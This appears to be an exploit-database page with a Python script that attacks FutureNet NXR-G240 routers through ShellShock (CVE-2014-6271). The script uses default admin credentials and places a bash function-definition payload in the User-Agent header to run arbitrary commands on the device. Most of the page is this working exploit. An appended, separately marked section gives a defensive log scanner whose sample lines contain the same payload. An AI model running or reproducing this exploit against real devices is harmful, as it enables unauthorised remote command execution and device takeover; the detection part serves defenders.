FutureNet NXR-G240 Series ShellShock Command Injection
Source: wassline at gmail.com  Author: Asrir  Published: 2018-12-10
# -*- coding: utf-8 -*-
# Title: FutureNet NXR-G240 Series - "ShellShock" Remote Command Injection
# Date: 2018-06-12
# Author: Nassim Asrir
# You have a Q ? Contact me at: https://www.linkedin.com/in/nassim-asrir-b73a57122/
# Vendor: http://www.centurysys.co.jp/
# CVE: CVE-2014-6271
# Greetz to : Nadia BENCHIKHA for the great help.
# Example:
# [root@parrot]-[/home/sniperpex/Desktop]
# #python ./exploit.py http://server -u admin -p admin -c ps

import urllib2
import base64
import bs4
import sys
import argparse
reload(sys)
sys.setdefaultencoding('utf8')

ap = argparse.ArgumentParser(description="FutureNet NXR-G240 Series - ShellShock Remote Command Injection ")

ap.add_argument("host", help="(Example: http://127.0.0.1).")

ap.add_argument("-u", "--user", default="admin", help="Admin username (Default: admin)")

ap.add_argument("-p", "--password", default="admin", help="Admin password (Default: admin)")

ap.add_argument("-c", "--cmd", help="Command to run.")

args = ap.parse_args()

request = urllib2.Request(args.host+"/cgi-bin/information.cgi?section=arp&module=system&command=execute")

base64string = base64.encodestring('%s:%s' % (args.user, args.password)).replace('\n', '')

print '[+] Authentication & Exploit in progress...'

request.add_header("Authorization", "Basic %s" % base64string)

request.add_header("User-Agent", "() { :;}; /bin/bash -c "+str(args.cmd))

response = urllib2.urlopen(request)

soup = bs4.BeautifulSoup(response, 'html.parser')

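# The two literals stripped from the output below appear to be mis-encoded
# non-ASCII text on this page; they are kept as found, with the embedded
# quote escaped so the line parses.
for textarea in soup.find_all('pre'):
    print textarea.get_text().replace("# ARPaea +-",'').replace("e!\"c$?oaSSaa3/4aa",'')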
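
Added example (not part of the original exploit or the author's code): a defender-side check that scans web server access logs for the bash function-definition marker `() {` that the script above places in the User-Agent header. It assumes Combined Log Format, which the page does not confirm for this device; the function names and the sample log lines are constructed for illustration.

```python
import re

# Bash function-definition prefix that triggers CVE-2014-6271 when a CGI
# handler exports request headers into the environment of a bash process.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")

# Assumed format (Combined Log Format): host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<request>(?:[^"\\]|\\.)*)" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>(?:[^"\\]|\\.)*)" "(?P<agent>(?:[^"\\]|\\.)*)"$'
)

def find_shellshock(lines):
    """Return one dict per log line whose request, Referer or User-Agent holds the marker."""
    hits = []
    for lineno, line in enumerate(lines, 1):
        m = LOG_RE.match(line.strip())
        if not m:
            continue  # unparseable line: skipped here, worth counting in production
        fields = [f for f in ("request", "referer", "agent") if SHELLSHOCK_RE.search(m.group(f))]
        if fields:
            hits.append({
                "line": lineno,
                "src": m.group("src"),
                "user": m.group("user"),  # authenticated user, if the server logged one
                "cgi": "/cgi-bin/" in m.group("request"),  # CGI targets are the exposed path
                "fields": fields,
            })
    return hits

# Constructed sample lines (documentation address ranges, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - admin [10/Dec/2018:10:00:01 +0900] "GET /cgi-bin/information.cgi?section=arp&module=system&command=execute HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '198.51.100.7 - admin [10/Dec/2018:10:02:13 +0900] "GET /cgi-bin/information.cgi?section=arp&module=system&command=execute HTTP/1.1" 200 734 "-" "() { :;}; /bin/bash -c ps"',
    '203.0.113.5 - - [10/Dec/2018:10:03:40 +0900] "GET /index.html HTTP/1.1" 200 120 "() { :;}; /bin/bash -c ps" "curl/7.58.0"',
]

if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print(hit)
```

A hit with `cgi` true and a non-anonymous `user` matches the authenticated request pattern used by the script above; the durable fix remains a bash build patched for CVE-2014-6271.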

 